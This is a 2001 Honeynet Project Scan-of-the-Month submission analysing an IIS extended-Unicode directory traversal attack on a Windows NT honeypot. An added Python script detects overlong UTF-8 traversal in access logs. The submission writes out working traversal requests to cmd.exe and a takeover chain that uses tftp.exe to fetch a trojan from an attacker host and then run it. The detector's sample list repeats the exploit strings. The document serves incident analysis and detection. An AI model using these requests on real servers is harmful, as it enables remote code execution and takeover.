From tiger@hideout.art.ro Wed Feb 14 19:13:03 2001
Date: Thu, 1 Feb 2001 18:31:02 +0200
From: Octavian Popescu
To: project@honeynet.org
Subject: scan of the month (02.01)

### QUESTION 1: What is the operating system of the honeypot,

MS Windows NT 4.0

### how do you know?

By the honeypot's initial TTL size - 128, the HTTP response headers
(Server: Microsoft-IIS/4.0) and the output of the attacker's request.
(found in SESSION:1443-80)

### QUESTION 2: What is the name of this attack?

Extended UNICODE directory traversal.
(vulnerable servers - IIS 4.0, IIS 5.0)

### QUESTION 3: What is the attack attempting to accomplish?

dir c:\ ;)
(a listing of the files in the root directory)

### QUESTION 4: How does the attack work?

By using extended UNICODE representations for "/" and "\" in a web request,
you can access (read, write, execute) any file on the victim's drive, under
the privileges of the IUSR_machinename account. (sort of anonymous account
for IIS)

Our case:

47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E C0 AF 2E   GET /msadc/.....
2E 2F 2E 2E C0 AF 2E 2E 2F 2E 2E C0 AF 2E 2E 2F   ./....../....../
77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63   winnt/system32/c
6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 2B 63 3A   md.exe?/c+dir+c:
5C                                                \

We see that "/" was represented using "%c0%af". In other words, the
attacker typed:

GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

### Bonus Question: Is it possible to gain remote control of the system using
this technique? If so, how?

Yes. By downloading via TFTP (tftp.exe -i evil_ip GET trojan.exe
c:\winnt\system32\trojan.exe) a trojan and then executing it via the above
method. e.g.

Downloading the trojan.exe file:

$telnet victim 80
GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/tftp.exe+"-i"+your_ip+GET+trojan.exe+c:\winnt\system32\trojan.exe

Executing it:

GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/trojan.exe
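The submission explains why the request slips past the IIS path check: the server's traversal filter runs before the overlong UTF-8 byte pairs (such as C0 AF for "/" and C1 9C for "\") are decoded, so the literal request contains no "../" sequence at the time it is inspected. The detection script below is an added example written for this page; it is not part of the submission or of any Honeynet Project tooling. It does what the filter should have done: percent-decode the request path, collapse the 2-byte overlong forms of ASCII characters back to the character they encode (the general rule, of which %c0%af is one instance), and then walk the normalized path to see whether it climbs above the web root. The sample request lines are constructed for the example; only the shape of the first one follows the request quoted in the submission.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample request lines (not from the original capture); the first
# mirrors the shape of the %c0%af request the submission quotes.
SAMPLE_REQUESTS = [
    "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0",
    "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",   # C1 9C -> "\"
    "GET /index.html HTTP/1.0",
    "GET /docs/caf%c3%a9.html HTTP/1.0",   # valid two-byte UTF-8 (e-acute), not overlong
]


def normalize_path(raw: bytes):
    """Return (decoded_path, overlong_count).

    A two-byte sequence with lead byte C0 or C1 can only encode a code point
    below 0x80, i.e. an ASCII character that UTF-8 requires to be written as a
    single byte. A lenient decoder (the behaviour this attack relies on) accepts
    it anyway, so we fold it back to the ASCII byte it stands for and count it.
    Everything else is left alone and decoded as normal UTF-8.
    """
    fixed = bytearray()
    overlong = 0
    i = 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            # code point = low 5 bits of lead byte, then low 6 bits of continuation
            fixed.append(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            overlong += 1
            i += 2
        else:
            fixed.append(b)
            i += 1
    return fixed.decode("utf-8", errors="replace"), overlong


def escapes_web_root(path: str) -> bool:
    """True if the path's '..' segments ever climb above the starting directory.

    Both '/' and '\\' are treated as separators, since IIS accepts either.
    """
    depth = 0
    for segment in re.split(r"[\\/]+", path):
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True
        elif segment not in ("", "."):
            depth += 1
    return False


def analyze_request(line: str) -> dict:
    """Decode one HTTP request line and report traversal indicators."""
    parts = line.split(" ")
    target = parts[1] if len(parts) > 1 else line
    path = target.split("?", 1)[0]            # ignore the query string
    decoded, overlong = normalize_path(unquote_to_bytes(path))
    escapes = escapes_web_root(decoded)
    return {
        "path": path,
        "decoded": decoded,
        "overlong_sequences": overlong,
        "escapes_root": escapes,
        "suspicious": overlong > 0 or escapes,
    }


def scan(lines):
    """Return the analysis of every request line that looks suspicious."""
    return [r for r in (analyze_request(l) for l in lines) if r["suspicious"]]


if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(f"{finding['path']}\n  -> {finding['decoded']} "
              f"(overlong={finding['overlong_sequences']}, escapes_root={finding['escapes_root']})")
```

Run it over a web server access log (one request per line) to get the same two signals the honeypot analysis relied on: the presence of overlong sequences at all, which a legitimate client never sends, and a decoded path that leaves the document root. Either alone is worth an alert; the accented-filename sample shows that ordinary non-ASCII paths are not flagged.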